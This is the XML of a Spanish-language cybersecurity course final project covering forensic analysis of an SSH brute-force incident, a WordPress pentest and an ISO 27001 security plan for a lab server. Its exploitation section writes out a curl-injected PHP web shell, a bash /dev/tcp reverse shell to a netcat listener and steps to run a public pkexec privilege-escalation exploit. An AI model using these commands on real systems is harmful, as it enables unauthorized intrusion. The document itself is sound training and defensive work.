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aps/>
          <w:color w:val="888888"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4GEEKS ACADEMY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pP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PROYECTO FINAL DE CIBERSEGURIDAD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Análisis Forense, Pentesting y Plan de Gestión de Seguridad</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="4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Organización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4Geeks Academy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Clasificación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Confidencial — Uso Interno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Fecha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Versión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 — Entrega Final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Fases cubiertas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Fase 1 (Forense) · Fase 2 (Pentesting) · Fase 3 (SGSI/ISO 27001)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Índice de Contenidos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1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FASE 1  Análisis Forense e Incidente SSH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·····················  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1.1  Servicios comprometidos y vector de acceso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············  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1.2  Auditoría del sistema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··································  4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1.3  Contención y cierre del exploit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······················  4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1.4  Fortalecimiento de configuraciones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··················  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1.5  Recomendaciones y resumen ejecutivo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···············  5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FASE 2  Detección y Explotación de Vulnerabilidad RCE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·····  6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2.1  Escaneo y detección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·····································  6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2.2  Explotación de la vulnerabilidad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·····················  7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2.3  Impacto y análisis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·····································  8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2.4  Medidas correctivas y verificación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··················  8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FASE 3  Plan de Respuesta a Incidentes y SGSI ISO 27001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···  10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3.1  Plan de Respuesta — NIST SP 800-61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················  10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3.2  Mecanismos de Protección de Datos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·················  13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3.3  SGSI conforme a ISO 27001:2022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·····················  14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3.4  Presentación Ejecutiva para Gerencia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··············  18</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1F3864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FASE 1 — ANÁLISIS FORENSE E INCIDENTE DE SEGURIDAD  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Servicios Comprometidos y Vector de Acceso Inicial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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagnóstico del Incidente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análisis retrospectivo de los registros de auditoría mediante journalctl confirma que el atacante obtuvo acceso inicial al servidor el 8 de octubre a las 17:40:59 aprovechando el servicio SSH (Puerto 22).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Evidencia forense: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journalctl -u ssh | grep "Accepted"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Salida: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Oct 08 17:40:59 debian sshd[1650]: Accepted password for root from 192.168.0.134 port 45623 ssh2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2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Vector de ataque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Fuerza bruta / diccionario automatizado por SSH (puerto 22)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IP atacante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192.168.0.134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Cuenta comprometida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root (máximos privilegios)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Fecha / Hora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 de octubre — 17:40:59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Impacto inmediato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Control total del servidor sin necesidad de escalación local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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Servicio FTP (vsftpd) — Vulnerabilidad adicional detectada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Durante el análisis forense se identificó un segundo servicio vulnerable: vsftpd (FTP en puerto 21).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ss -tulpn | grep ":21"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Salida: tcp LISTEN 0 32 *:21 — users: (("vsftpd",pid=544,fd=3))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cat /etc/vsftpd.conf | grep -E "anonymous|local_enable|write_enable"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Configuración vulnerable detectada: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anonymous_enable=YES  →  acceso anónimo permitido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local_enable=YES  →  usuarios locales con acceso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write_enable=YES  →  subida de archivos habilitada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Auditoría del Sistema e Identificación de Artefactos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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Inspección de Procesos y Memoria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ls -l /proc/*/exe 2&gt;/dev/null | grep -E 'tmp|shm|var/run'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Resultado: Vacío → No se detectan ejecutables anómalos activos en memoria.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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Revisión de Cuentas del Sistema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grep ":0:" /etc/passwd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Resultado: root:x:0:0:root:/root:/bin/bash → Solo existe la cuenta legítima root. No se crearon usuarios backdoor.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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Auditoría de Rootkits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chkrootkit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Resultado: not infected / not found → Sistema limpio de rootkits y malware conocido.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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Análisis Forense con Autopsy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analizó la partición /dev/sda1 con la herramienta Autopsy, identificando actividad relevante en el directorio /srv/ftp/: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Modified: 2024-10-08 16:09:00 EDT — aproximadamente 1.5 horas antes del acceso SSH.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Grupo asociado: ftp (GID 122). Directorio actualmente vacío — posible limpieza de evidencias por parte del atacante.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Medidas de Contención y Cierre del Exploit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800"/>
        <w:gridCol w:w="2026"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trP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3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Comando</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Detener servicio SSH durante análisis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systemctl stop ssh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 Completado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Bloquear IP del atacante en firewall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ufw deny from 192.168.0.134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 Completado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Configurar UFW — política restrictiva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ufw default deny incoming; allow 22,80/tcp; ufw enable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 Completado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Deshabilitar y purgar servicio FTP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systemctl disable vsftpd &amp;&amp; apt purge vsftpd -y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 Completado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Restaurar servicio SSH con nueva config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systemctl start ssh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 Completado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Fortalecimiento de Configuraciones y Credenciales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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Cambio de Contraseña de Root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passwd root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estableció una contraseña de alta complejidad (mínimo 16 caracteres, combinación de mayúsculas, minúsculas, números y símbolos).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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Deshabilitación de Login Root por SSH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echo "PermitRootLogin no" | sudo tee -a /etc/ssh/sshd_config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systemctl restart sshd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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Corrección de Credencial Débil en MySQL y WordPress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Credencial débil detectada en wp-config.php: contraseña '123456' para el usuario wordpress.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mysql -u root -p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ALTER USER 'wordpress'@'localhost' IDENTIFIED BY 'NuevaClaveSegura123!';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FLUSH PRIVILEGES;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sed -i "s/123456/NuevaClaveSegura123!/g" /var/www/html/wp-config.php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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Actualización de Paquetes del Sistema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apt update &amp;&amp; sudo apt upgrade -y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 Recomendaciones y Resumen Ejecutivo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rPr>
          <w:tblHeader/>
        </w:trPr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4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Medida Recomendada</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Justificación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CRÍTICA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Eliminar vsftpd definitivamente (apt purge vsftpd -y)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Servicio FTP innecesario con acceso anónimo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CRÍTICA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Implementar Fail2ban con bloqueo tras 3 intentos fallidos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Previene ataques de fuerza bruta SSH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CRÍTICA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Autenticación SSH por clave pública (deshabilitar passwords)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Elimina vectores de fuerza bruta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🟠 ALTA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Cambiar puerto SSH a no estándar (&gt;1024)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Reduce escaneos automatizados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🟠 ALTA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Monitorización en tiempo real con SIEM (Wazuh)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Detección proactiva de accesos anómalos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🟡 MEDIA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Política de contraseñas robusta a nivel de sistema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Evita credenciales triviales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8 de octubre de 2024, un atacante con IP 192.168.0.134 accedió al servidor como root a través de SSH mediante ataque de fuerza bruta. No se encontraron rootkits, backdoors ni usuarios ocultos. Todas las medidas de contención fueron aplicadas con éxito.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1B4F72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FASE 2 — DETECCIÓN Y EXPLOTACIÓN DE VULNERABILIDAD RCE  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Vulnerabilidad identificada: Ejecución Remota de Código (RCE) en el servidor web a través del tema de WordPress Twenty Twenty-Four. Diferente a las vulnerabilidades corregidas en la Fase 1 (SSH y FTP).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Escaneo y Detección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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Escaneo inicial con Nmap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nmap -sV -sC 192.168.1.33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1500"/>
        <w:gridCol w:w="5226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Puerto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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52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Versión / Hallazgo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21/tcp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ftp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vsftpd 3.0.3 — Anonymous FTP login allowed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22/tcp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ssh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OpenSSH 9.2p1 Debian 2+deb12u3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80/tcp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Apache httpd 2.4.62 — WordPress 7.0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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Hallazgos adicionales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Directory listing habilitado en /wp-content/uploads/ — exposición de archivos subidos.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Tema Twenty Twenty-Four versión 1.2 instalado — versión desactualizada.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WordPress versión 7.0 detectado vía http-generator.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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerabilidad Detectada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archivo 404.php del tema Twenty Twenty-Four se encontraba vacío y accesible públicamente, sin ninguna restricción de escritura desde el servidor web. Esto permitía inyectar código PHP malicioso a través de la URL y ejecutar comandos arbitrarios en el sistema operativo con los permisos del proceso Apache (www-data).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64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Tipo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Remote Code Execution (RCE) — CWE-94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Vector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GET — parámetro cmd en archivo PHP público del tema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CVSS (estimado)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9.8 CRÍTICO — acceso remoto sin autenticación, ejecución de código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Componente afectado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/wp-content/themes/twentytwentyfour/404.php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Usuario comprometido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www-data (uid=33, gid=33)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Explotación de la Vulnerabilidad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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 1 — Inyección de código PHP malicioso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aprovecha el archivo 404.php vacío para escribir una web shell en el directorio raíz del servidor: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curl "http://192.168.1.33/wp-content/themes/twentytwentyfour/404.php?cmd=echo%20'&lt;?php%20system(%24_GET[%22cmd%22]);%20?&gt;'%20&gt;%20/var/www/html/shell.php"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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 2 — Verificación de RCE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confirma la ejecución de comandos del sistema operativo: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curl "http://192.168.1.33/shell.php?cmd=id"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Respuesta obtenida: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uid=33(www-data) gid=33(www-data) groups=33(www-data)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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 3 — Obtención de Shell Reversa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Máquina atacante (listener):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nc -lvnp 4444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Petición hacia el servidor víctima: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curl "http://192.168.1.33/shell.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/192.168.1.33/4444%200%3E%261%27"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Resultado: shell interactiva como www-data obtenida con éxito.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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 4 — Exploración y Escalada de Privilegios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cat /etc/passwd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find / -perm -4000 -type f 2&gt;/dev/null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cd /tmp &amp;&amp; git clone https://github.com/berdav/CVE-2021-4034.git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cd CVE-2021-4034 &amp;&amp; make &amp;&amp; ./cve-2021-4034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identificaron binarios SUID susceptibles de abuso y se intentó escalada mediante CVE-2021-4034 (Polkit pkexec).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Impacto de la Vulnerabilidad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Dimensión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54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Confidencialidad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ALTA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Lectura de wp-config.php con credenciales, /etc/passwd, logs y cualquier archivo legible por www-data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ALTA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Modificación o eliminación de archivos del sitio web, inyección de contenido malicioso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Disponibilidad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🟠 MEDIA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 atacante puede interrumpir el servicio web o eliminar archivos críticos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Alcance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CRÍTICO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Compromiso total del servidor web; pivote para ataques a sistemas internos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Capacidades del atacante tras la explotación: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Ejecutar comandos arbitrarios en el servidor con permisos de www-data.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Leer archivos de configuración sensibles incluyendo credenciales de base de datos.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Subir y descargar archivos arbitrarios.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Usar el servidor comprometido como pivote para ataques a la red interna.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Escalar privilegios a root mediante vulnerabilidades de kernel o binarios SUID.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Medidas Correctivas Aplicadas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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Eliminación del código malicioso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rm -f /var/www/html/shell.php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echo '&lt;?php get_header(); ?&gt;' | sudo tee /var/www/html/wp-content/themes/twentytwentyfour/404.php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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Deshabilitación de Directory Listing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a2dismod autoindex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systemctl reload apache2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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Actualización del tema vulnerable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cd /var/www/html/wp-content/themes/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rm -rf twentytwentyfour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wp theme install twentytwentyfour --activate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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Refuerzo de seguridad general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find /var/www/html -type f -exec chmod 644 {} \;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find /var/www/html -type d -exec chmod 755 {} \;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echo "php_admin_flag engine off" | sudo tee /var/www/html/wp-content/uploads/.htaccess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chmod 600 /var/www/html/wp-config.php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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Verificación de la Corrección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626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Verificación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Comando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Respuesta Esperada</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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shell.php eliminada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curl http://192.168.1.33/shell.php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 Verificado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Directory listing OFF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curl http://192.168.1.33/wp-content/uploads/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 Verificado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RCE deshabilitado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curl .../404.php?cmd=id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Página 404 sin ejecución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 Verificado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426"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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Medida</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="44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Implementación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ALTA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Mantener temas y plugins actualizados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wp theme update --all (automatizar con cron)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ALTA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Deshabilitar directory listing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a2dismod autoindex — aplicado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ALTA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Permisos seguros en wp-config.php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chmod 600 wp-config.php — aplicado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🟠 MEDIA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Implementar WAF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ModSecurity con reglas OWASP Core Rule Set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🟠 MEDIA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Deshabilitar XML-RPC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Bloquear xmlrpc.php en .htaccess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🟡 BAJA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Auditoría regular de archivos PHP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find /var/www -name "*.php" -mtime -1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="154360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FASE 3 — PLAN DE RESPUESTA A INCIDENTES Y SGSI ISO 27001  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Plan de Respuesta a Incidentes — NIST SP 800-61 Rev. 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plan se basa en el NIST SP 800-61 Rev. 2, estructurado en cuatro fases cíclicas orientadas a garantizar una respuesta eficaz ante incidentes de seguridad como los documentados en las Fases 1 y 2.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600"/>
        <w:gridCol w:w="2126"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trP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NIST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21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Preparación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Establecer capacidades de respuesta antes del incidente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CISO / Dpto. IT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Detección y Análisis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Identificar, confirmar y caracterizar el incidente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SOC / Analista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Contención, Erradicación y Recuperación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Limitar el daño, eliminar causa raíz y restaurar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CSIRT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Post-Incidente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Documentar lecciones aprendidas y mejorar controles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CISO / Dirección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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Fase 1 — Preparación: Equipo CSIRT y Herramientas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designa un Computer Security Incident Response Team (CSIRT) con los siguientes roles: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Coordinador de Incidentes: comunicación interna/externa, toma de decisiones y escalado.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Analista Forense: recopilación y preservación de evidencias, análisis de logs y artefactos.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Administrador de Sistemas: ejecución de medidas de contención, parches y restauración.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Responsable Legal / Cumplimiento: evaluación de obligaciones regulatorias (RGPD, LOPD-GDD).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Comunicaciones: gestión de la información hacia usuarios, clientes y medios si procede.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Herramientas del stack de seguridad recomendado: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SIEM: Wazuh / Elastic SIEM — correlación centralizada de eventos en tiempo real.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IDS/IPS: Suricata — detección de tráfico malicioso en la red.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Gestión de vulnerabilidades: OpenVAS — escaneos semanales programados.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Autenticación: Fail2ban + autenticación SSH por clave pública.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Backups: solución cifrada (AES-256) con retención de 30 días y copia offsite.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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Fase 2 — Detección y Análisis: Clasificación de Incidentes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4200"/>
        <w:gridCol w:w="2226"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trP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Severidad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4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  <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Tiempo de Respuesta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CRÍTICA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Compromiso root, ransomware, exfiltración masiva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1 hora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RCE en aplicación web, acceso no autorizado a BD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4 horas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Fuerza bruta detectada, malware aislado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24 horas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BAJA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Violaciones menores de política, spam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72 horas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Indicadores de Compromiso (IoC) específicos para 4Geeks Academy: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Logins SSH exitosos desde IPs externas no whitelisted, especialmente como root.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Creación de archivos .php en directorios de temas o uploads de WordPress.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Conexiones salientes a puertos no estándar (ej: 4444 TCP — shell reversa).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Modificación de wp-config.php, sshd_config o archivos Apache fuera de mantenimiento.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Presencia de herramientas de explotación en /tmp (CVE-2021-4034, netcat, etc.).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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Fase 3 — Contención, Erradicación y Recuperación: Playbooks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Playbook A: Compromiso SSH por Fuerza Bruta (Incidente Fase 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800"/>
        <w:gridCol w:w="2126"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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3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Comando / Herramienta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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Detener SSH — evitar reingreso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systemctl stop ssh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Servicio detenido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Bloquear IP atacante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ufw deny from 192.168.0.134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IP bloqueada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Cambiar contraseña root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passwd root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Credencial segura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Deshabilitar root por SSH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PermitRootLogin no en sshd_config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Root SSH desactivado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Purgar FTP inseguro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systemctl disable vsftpd &amp;&amp; apt purge vsftpd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Servicio eliminado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Corregir credencial MySQL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ALTER USER 'wordpress'@... IDENTIFIED BY '...'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Contraseña actualizada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Configurar UFW restrictivo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ufw default deny incoming; allow 22,80/tcp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Firewall endurecido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Actualizar sistema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apt update &amp;&amp; apt upgrade -y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Parches aplicados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Verificar rootkits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chkrootkit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Sistema limpio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Restaurar SSH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systemctl start ssh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Servicio restaurado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Playbook B: RCE en WordPress (Incidente Fase 2)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Aislar el servidor: systemctl stop apache2 para detener el acceso web durante la respuesta.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Eliminar artefactos: rm -f /var/www/html/shell.php y todos los .php no pertenecientes al CMS.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Restaurar archivos del tema desde repositorio oficial de WordPress.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Deshabilitar directory listing: a2dismod autoindex &amp;&amp; systemctl reload apache2.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Aplicar permisos seguros: chmod 644 archivos, 755 directorios, 600 wp-config.php.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Bloquear ejecución PHP en uploads: agregar php_admin_flag engine off en .htaccess.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Actualizar WordPress, temas y plugins a sus versiones más recientes.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Revisar usuarios de WordPress y MySQL para detectar cuentas no autorizadas.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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Fase 4 — Post-Incidente: Métricas y Lecciones Aprendidas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326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4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23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MTTD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Mean Time to Detect — tiempo entre inicio del ataque y detección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30 minutos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MTTR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Mean Time to Respond — tiempo entre detección y contención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2 horas (P1/P2)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Tasa de recurrencia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% de incidentes del mismo tipo en 12 meses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Cobertura backups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% de sistemas críticos con copia verificada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Mecanismos de Protección de Datos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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Política de Copias de Seguridad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426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Frecuencia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Retención</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Almacenamiento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(Completo)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Semanal (domingo)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semanas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Offsite cifrado AES-256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Incremental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Diario (00:00 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 días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NAS local + replicación cloud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Base de datos MySQL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Cada 6 horas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 días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Servidor de backups dedicado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Configuración de servicios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Tras cada cambio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Últimas 10 versiones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Repositorio Git privado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RTO objetivo: 4 horas para sistemas críticos. Se realizará una prueba de restauración completa mensualmente, documentando el tiempo de recuperación e integridad de los datos.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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Cifrado de Datos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En reposo: AES-256 para backups, bases de datos con información personal y archivos de configuración sensibles.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En tránsito: TLS 1.2/1.3 obligatorio para todas las comunicaciones web (HTTPS); SSH con autenticación por clave pública (ED25519 o RSA-4096).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Gestión de claves: rotación semestral; almacenamiento en bóveda segura (HashiCorp Vault o equivalente).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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Control de Acceso y DLP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Principio de mínimo privilegio: permisos imprescindibles para cada rol o proceso.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Autenticación multifactor (MFA): obligatoria para SSH, panel WordPress y consola MySQL desde red externa.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Revisión trimestral de accesos: auditoría de cuentas activas, privilegios y accesos de ex-empleados.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Monitorización de tráfico saliente: alertas ante transferencias de datos inusuales en volumen o destino.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Clasificación de datos: etiquetado de información sensible (datos personales, credenciales, información financiera).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Sistema de Gestión de Seguridad de la Información — ISO 27001:2022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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Alcance del SGSI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Servidor web de producción (Debian 12): WordPress, Apache, MySQL y servicios SSH.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Base de datos de estudiantes, contenidos del curso y datos de acceso.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Infraestructura de red: equipos de red, firewall UFW, comunicaciones internas y externas.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Procesos: desarrollo y mantenimiento de plataforma, gestión de usuarios, soporte técnico.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Personal: equipo técnico, administradores de sistemas, desarrolladores y soporte.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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Política de Seguridad de la Información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Dirección de 4Geeks Academy se compromete a: proteger la confidencialidad, integridad y disponibilidad de la información; cumplir con RGPD y LOPD-GDD; proporcionar recursos adecuados para el SGSI; y fomentar una cultura de seguridad mediante formación continua. Esta política será revisada anualmente.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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Evaluación de Riesgos — Metodología Cualitativa (Probabilidad × Impacto, escala 1-5)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1200"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="1826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Amenaza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Activo Afectado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Probabilidad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1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18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Tratamiento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Fuerza bruta SSH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Servidor SSH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25 CRÍTICO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Mitigar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RCE WordPress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Servidor web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20 ALTO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Mitigar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FTP acceso anónimo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Servidor FTP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16 ALTO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Evitar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Inyección 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MySQL/WP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15 ALTO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Mitigar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Escalada SUID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Sistema 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15 ALTO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Mitigar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Pérdida datos hardware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10 MEDIO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Mitigar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Phishing empleados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Credenciales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9 MEDIO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Mitigar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Disponibilidad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6 BAJO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Transferir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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Plan de Tratamiento de Riesgos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3100"/>
        <w:gridCol w:w="1726"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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2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 ISO 27002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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 concreta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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Plazo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Fuerza bruta SSH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A.8.5 Autenticación segura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Fail2ban + clave pública + puerto no estándar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Inmediato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RCE WordPress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A.8.8 Gestión de vulnerabilidades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ModSecurity WAF + actualizaciones automáticas + permisos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semana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FTP inseguro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A.8.21 Seguridad servicios de red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apt purge vsftpd; SFTP si necesario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Inmediato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Inyección SQL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A.8.28 Codificación segura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WAF, plugins WP, auditoría de código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mes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Escalada SUID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A.8.18 Privilegios de acceso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Auditoría mensual de SUID + parches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Mensual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Pérdida de datos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A.8.13 Copias de seguridad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Backups diarios cifrados + pruebas restauración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semana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Phishing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A.6.3 Concienciación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Formación trimestral + simulaciones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Trimestral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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Controles del Anexo A (ISO 27001:2022) — Selección Aplicada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42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Implementación en 4Geeks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A.5.1 Políticas de SI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Aprobación y publicación de la política de seguridad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Presente documento aprobado por Dirección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A.5.24 Gestión incidentes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Proceso consistente de respuesta a incidentes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Playbooks A y B documentados en sección 3.1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A.6.3 Formación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Concienciación y formación del personal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Programa anual de ciberseguridad para todos los empleados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A.8.2 Acceso privilegiado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Gestión de cuentas root y sudo con auditoría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PermitRootLogin no; sudo con registro de comandos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A.8.5 Autenticación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MFA para accesos remotos y administración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MFA obligatorio para SSH, WP admin y MySQL externo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A.8.7 Anti-malware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Protección y escaneos periódicos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chkrootkit + EDR; escaneos diarios programados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A.8.8 Vulnerabilidades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Escaneos semanales y parches en &lt; 30 días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OpenVAS semanal; parches críticos en &lt; 30 días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A.8.13 Backups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Copias de seguridad cifradas con verificación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Política completa definida en sección 3.2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A.8.16 Monitorización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SIEM con alertas en tiempo real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Wazuh con reglas personalizadas para IoC de 4Geeks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A.8.28 Codificación segura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Revisión de código + OWASP Top 10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Revisión en cada deploy; WAF ModSecurity activo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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">KPIs del SGSI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200"/>
        <w:gridCol w:w="2426"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trP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Frecuencia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24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Nº de incidentes de seguridad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Mensual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Tendencia decreciente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MTTD (detección)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 incidente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30 minutos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MTTR (respuesta)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 incidente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2 horas (P1/P2)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CSIRT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Cobertura de parches críticos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Mensual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 en &lt; 30 días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Personal formado en seguridad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RRHH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Pruebas de backup superadas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Mensual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Vulnerabilidades críticas abiertas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Semanal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 con más de 30 días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CISO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Presentación Ejecutiva para la Gerencia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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Resumen del Incidente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8 de octubre de 2024, el servidor de producción de 4Geeks Academy fue comprometido en dos fases: acceso root por fuerza bruta SSH (Fase 1) y explotación de RCE en WordPress Twenty Twenty-Four (Fase 2). Ambos incidentes fueron contenidos y documentados con éxito. No se encontraron rootkits, backdoors ni usuarios ocultos.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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Inversión en Seguridad — Coste de No Actuar vs. SGSI Implementado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Sin medidas correctivas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4513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 SGSI implementado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Multas RGPD por fuga de datos: hasta 20M EUR o 4% de la facturación anual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Coste de implementación del SGSI: bajo-medio comparado con el riesgo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Daño reputacional: pérdida de confianza de alumnos y partners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Ventaja competitiva: certificación ISO 27001 como aval de calidad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Tiempo de inactividad del servicio: pérdida de ingresos directos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Reducción del riesgo operativo y menor coste de incidentes futuros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Coste de remediación reactiva (históricamente más alto que la prevención)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Cumplimiento regulatorio sin sanciones (RGPD, ENS, LOPD-GDD)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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Hoja de Ruta — Próximos 12 Meses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4400"/>
        <w:gridCol w:w="2226"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trP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4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Acciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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1-2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Fundamentos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Fail2ban, MFA, backups cifrados, purga vsftpd, permisos WP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3-4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Monitorización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Despliegue SIEM (Wazuh), IDS (Suricata), dashboards de alertas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Sysadmin / SOC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5-6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Aplicación web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WAF ModSecurity, actualizaciones automáticas, HTTPS/HSTS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Dev / Sysadmin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7-8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Personas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Formación, simulacros de phishing, política escritorio limpio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RRHH / CISO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9-10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SGSI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Documentación completa, auditoría interna, análisis brechas ISO 27001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CISO / Dirección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11-12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Certificación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Pre-auditoría externa, resolución NC, solicitud certificación ISO 27001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CISO / Dirección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597"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
